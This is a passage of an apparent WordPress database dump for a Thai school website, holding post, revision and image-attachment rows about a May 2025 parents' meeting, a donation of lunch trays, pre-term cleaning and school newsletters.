alt=\"\" class=\"wp-image-1178\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ประชุมผู้ปกครอง 1/2568','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%ad%e0%b8%87-1-2568','','','2025-05-09 11:24:37','2025-05-09 04:24:37','',0,'http://pakhaeng.ssk.in.th/?p=1164',0,'post','',0),
(1165,1,'2025-05-09 11:17:57','2025-05-09 04:17:57','','LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2','','inherit','','closed','','line_album_%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3%e0%b8%b5','','','2025-05-09 11:17:57','2025-05-09 04:17:57','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2.jpg',0,'attachment','image/jpeg',0),
(1166,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291494_0','','inherit','','closed','','291494_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291494_0.jpg',0,'attachment','image/jpeg',0),
(1167,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291495_0','','inherit','','closed','','291495_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291495_0.jpg',0,'attachment','image/jpeg',0),
(1168,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291498_0','','inherit','','closed','','291498_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291498_0.jpg',0,'attachment','image/jpeg',0),
(1169,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291497_0','','inherit','','closed','','291497_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291497_0.jpg',0,'attachment','image/jpeg',0),
(1170,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291499_0','','inherit','','closed','','291499_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291499_0.jpg',0,'attachment','image/jpeg',0),
(1171,1,'2025-05-09 11:18:24','2025-05-09 04:18:24','','291496_0','','inherit','','closed','','291496_0','','','2025-05-09 11:18:24','2025-05-09 04:18:24','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291496_0.jpg',0,'attachment','image/jpeg',0),
(1172,1,'2025-05-09 11:18:28','2025-05-09 04:18:28','','291500_0','','inherit','','closed','','291500_0','','','2025-05-09 11:18:28','2025-05-09 04:18:28','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291500_0.jpg',0,'attachment','image/jpeg',0),
(1173,1,'2025-05-09 11:18:28','2025-05-09 04:18:28','','291501_0','','inherit','','closed','','291501_0','','','2025-05-09 11:18:28','2025-05-09 04:18:28','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291501_0.jpg',0,'attachment','image/jpeg',0),
(1174,1,'2025-05-09 11:18:28','2025-05-09 04:18:28','','291502_0','','inherit','','closed','','291502_0','','','2025-05-09 11:18:28','2025-05-09 04:18:28','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291502_0.jpg',0,'attachment','image/jpeg',0),
(1175,1,'2025-05-09 11:18:29','2025-05-09 04:18:29','','LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1','','inherit','','closed','','line_album_%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3-2','','','2025-05-09 11:18:29','2025-05-09 04:18:29','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1.jpg',0,'attachment','image/jpeg',0),
(1176,1,'2025-05-09 11:18:30','2025-05-09 04:18:30','','LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3','','inherit','','closed','','line_album_%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3-3','','','2025-05-09 11:18:30','2025-05-09 04:18:30','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3.jpg',0,'attachment','image/jpeg',0),
(1177,1,'2025-05-09 11:18:31','2025-05-09 04:18:31','','LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2','','inherit','','closed','','line_album_%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3-4','','','2025-05-09 11:18:31','2025-05-09 04:18:31','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1.jpg',0,'attachment','image/jpeg',0),
(1178,1,'2025-05-09 11:18:34','2025-05-09 04:18:34','','LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4','','inherit','','closed','','line_album_%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3-5','','','2025-05-09 11:18:34','2025-05-09 04:18:34','',1164,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4.jpg',0,'attachment','image/jpeg',0),
(1179,1,'2025-05-09 11:18:44','2025-05-09 04:18:44','<!-- wp:paragraph -->\n<p>วันที่ 8 พฤษภาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน จัดประชุมผู้ปกครองนักเรียน ครั้งที่ 1/2568 เพื่อชี้แจง กฎ ระเบียบของโรงเรียน และเพื่อปรึกษา หารือ แนวทางการปฏิบัติ ร่วมกันกับผู้ปกครองนักเรียน และในการนี้ทางโรงเรียนได้รับมอบถาดอาหารกลางวันนักเรียน จาก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นายศุภชัย ดวงแก้ว จำนวน 150 ใบ รวมป็นเงินทั้งสิ้น 13,950 บาท ในโอกาสนี้ทางโรงเรียนบ้านหนองปลาเข็ง กอไหล่ ขอขอบพระคุณท่านเป็นอย่างสูง มา ณ โอกาสนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291494_0.jpg\" alt=\"\" class=\"wp-image-1166\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1167,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291495_0.jpg\" alt=\"\" class=\"wp-image-1167\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1171,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291496_0-1024x599.jpg\" alt=\"\" class=\"wp-image-1171\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1169,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291497_0-1024x643.jpg\" alt=\"\" class=\"wp-image-1169\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1168,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291498_0.jpg\" alt=\"\" class=\"wp-image-1168\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1170,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291499_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1170\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1172,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291500_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1172\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1173,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291501_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1173\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1174,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291502_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1174\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1175,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1175\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1177,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-1024x577.jpg\" alt=\"\" class=\"wp-image-1177\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1176,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1176\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1178,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1178\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ประชุมผู้ปกครอง 1/2568','','inherit','closed','closed','','1164-revision-v1','','','2025-05-09 11:18:44','2025-05-09 04:18:44','',1164,'http://pakhaeng.ssk.in.th/?p=1179',0,'revision','',0),
(1180,1,'2025-05-09 11:22:12','2025-05-09 04:22:12','<!-- wp:image {\"id\":1181,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/1-68-724x1024.png\" alt=\"\" class=\"wp-image-1181\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-34','','','2025-05-09 11:23:49','2025-05-09 04:23:49','',0,'http://pakhaeng.ssk.in.th/?p=1180',0,'post','',0),
(1181,1,'2025-05-09 11:21:41','2025-05-09 04:21:41','','1-68','','inherit','','closed','','1-68','','','2025-05-09 11:21:41','2025-05-09 04:21:41','',1180,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/1-68.png',0,'attachment','image/png',0),
(1182,1,'2025-05-09 11:22:12','2025-05-09 04:22:12','<!-- wp:image {\"id\":1181,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/1-68-724x1024.png\" alt=\"\" class=\"wp-image-1181\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1180-revision-v1','','','2025-05-09 11:22:12','2025-05-09 04:22:12','',1180,'http://pakhaeng.ssk.in.th/?p=1182',0,'revision','',0),
(1184,1,'2025-05-09 11:28:51','2025-05-09 04:28:51','','495090140_122153069060511674_4169399057052512528_n','','inherit','','closed','','495090140_122153069060511674_4169399057052512528_n','','','2025-05-09 11:28:51','2025-05-09 04:28:51','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495090140_122153069060511674_4169399057052512528_n.jpg',0,'attachment','image/jpeg',0),
(1186,1,'2025-05-14 21:24:46','2025-05-14 14:24:46','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1189,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293956_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1189\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1188,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293958-1024x578.jpg\" alt=\"\" class=\"wp-image-1188\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1190,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293960_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1190\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1191,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293970_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1191\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__37961737_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1187\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1194,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62078_0-Copy-1024x768.jpg\" alt=\"\" class=\"wp-image-1194\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1192,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62082_0-Copy-1024x768.jpg\" alt=\"\" class=\"wp-image-1192\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1195,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293288_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1195\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1197,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293289_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1197\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1193,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293290_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1193\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1196,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293293_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1196\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1198,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75415557-Copy-1024x576.jpg\" alt=\"\" class=\"wp-image-1198\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันที่ 13-14 พฤษภาคม พ.ศ.2568 ผู้บริหาร คณะครู และบุคลากรทางการศึกษาโรงเรียนบ้านหนองปลาเข็ง-กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้มาปฏิบัติหน้าที่ราชการ และทำความสะอาด บริเวณโรงเรียน และห้องเรียน เพื่อให้พร้อมใช้งานในวันเปิดภาคเรียน ในวันที่ 16 พฤษภาคม พ.ศ.2568 นี้','','publish','closed','closed','','%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-13-14-%e0%b8%9e%e0%b8%a4%e0%b8%a9%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b8%9e-%e0%b8%a8-2568-%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3','','','2025-05-14 21:24:47','2025-05-14 14:24:47','',0,'http://pakhaeng.ssk.in.th/?p=1186',0,'post','',0),
(1187,1,'2025-05-14 21:22:56','2025-05-14 14:22:56','','S__37961737_0','','inherit','','closed','','s__37961737_0','','','2025-05-14 21:22:56','2025-05-14 14:22:56','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__37961737_0.jpg',0,'attachment','image/jpeg',0),
(1188,1,'2025-05-14 21:22:56','2025-05-14 14:22:56','','293958','','inherit','','closed','','293958','','','2025-05-14 21:22:56','2025-05-14 14:22:56','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293958.jpg',0,'attachment','image/jpeg',0),
(1189,1,'2025-05-14 21:22:56','2025-05-14 14:22:56','','293956_0','','inherit','','closed','','293956_0','','','2025-05-14 21:22:56','2025-05-14 14:22:56','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293956_0.jpg',0,'attachment','image/jpeg',0),
(1190,1,'2025-05-14 21:22:56','2025-05-14 14:22:56','','293960_0','','inherit','','closed','','293960_0','','','2025-05-14 21:22:56','2025-05-14 14:22:56','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293960_0.jpg',0,'attachment','image/jpeg',0),
(1191,1,'2025-05-14 21:22:56','2025-05-14 14:22:56','','293970_0','','inherit','','closed','','293970_0','','','2025-05-14 21:22:56','2025-05-14 14:22:56','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293970_0.jpg',0,'attachment','image/jpeg',0),
(1192,1,'2025-05-14 21:23:49','2025-05-14 14:23:49','','62082_0 - Copy','','inherit','','closed','','62082_0-copy','','','2025-05-14 21:23:49','2025-05-14 14:23:49','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62082_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1193,1,'2025-05-14 21:23:49','2025-05-14 14:23:49','','293290_0 - Copy','','inherit','','closed','','293290_0-copy','','','2025-05-14 21:23:49','2025-05-14 14:23:49','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293290_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1194,1,'2025-05-14 21:23:49','2025-05-14 14:23:49','','62078_0 - Copy','','inherit','','closed','','62078_0-copy','','','2025-05-14 21:23:49','2025-05-14 14:23:49','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62078_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1195,1,'2025-05-14 21:23:50','2025-05-14 14:23:50','','293288_0 - Copy','','inherit','','closed','','293288_0-copy','','','2025-05-14 21:23:50','2025-05-14 14:23:50','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293288_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1196,1,'2025-05-14 21:23:50','2025-05-14 14:23:50','','293293_0 - Copy','','inherit','','closed','','293293_0-copy','','','2025-05-14 21:23:50','2025-05-14 14:23:50','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293293_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1197,1,'2025-05-14 21:23:50','2025-05-14 14:23:50','','293289_0 - Copy','','inherit','','closed','','293289_0-copy','','','2025-05-14 21:23:50','2025-05-14 14:23:50','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293289_0-Copy.jpg',0,'attachment','image/jpeg',0),
(1198,1,'2025-05-14 21:23:52','2025-05-14 14:23:52','','S__75415557 - Copy','','inherit','','closed','','s__75415557-copy','','','2025-05-14 21:23:52','2025-05-14 14:23:52','',1186,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75415557-Copy.jpg',0,'attachment','image/jpeg',0),
(1199,1,'2025-05-14 21:24:46','2025-05-14 14:24:46','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1189,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293956_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1189\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1188,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293958-1024x578.jpg\" alt=\"\" class=\"wp-image-1188\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1190,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293960_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1190\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1191,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293970_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1191\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__37961737_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1187\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1194,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62078_0-Copy-1024x768.jpg\" alt=\"\" class=\"wp-image-1194\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1192,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/62082_0-Copy-1024x768.jpg\" alt=\"\" class=\"wp-image-1192\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1195,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293288_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1195\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1197,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293289_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1197\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1193,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293290_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1193\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1196,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/293293_0-Copy-578x1024.jpg\" alt=\"\" class=\"wp-image-1196\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1198,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/S__75415557-Copy-1024x576.jpg\" alt=\"\" class=\"wp-image-1198\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันที่ 13-14 พฤษภาคม พ.ศ.2568 ผู้บริหาร คณะครู และบุคลากรทางการศึกษาโรงเรียนบ้านหนองปลาเข็ง-กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้มาปฏิบัติหน้าที่ราชการ และทำความสะอาด บริเวณโรงเรียน และห้องเรียน เพื่อให้พร้อมใช้งานในวันเปิดภาคเรียน ในวันที่ 16 พฤษภาคม พ.ศ.2568 นี้','','inherit','closed','closed','','1186-revision-v1','','','2025-05-14 21:24:46','2025-05-14 14:24:46','',1186,'http://pakhaeng.ssk.in.th/?p=1199',0,'revision','',0),
(1200,1,'2025-05-14 21:27:49','2025-05-14 14:27:49','<!-- wp:image {\"id\":1203,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2-68-1-724x1024.png\" alt=\"\" class=\"wp-image-1203\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ฉบับที่ 2 ปีที่ 3 ลงวันที่ 13 พฤษภาคม พ.ศ.2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%89%e0%b8%9a%e0%b8%b1','','','2025-05-14 21:29:40','2025-05-14 14:29:40','',0,'http://pakhaeng.ssk.in.th/?p=1200',0,'post','',0),
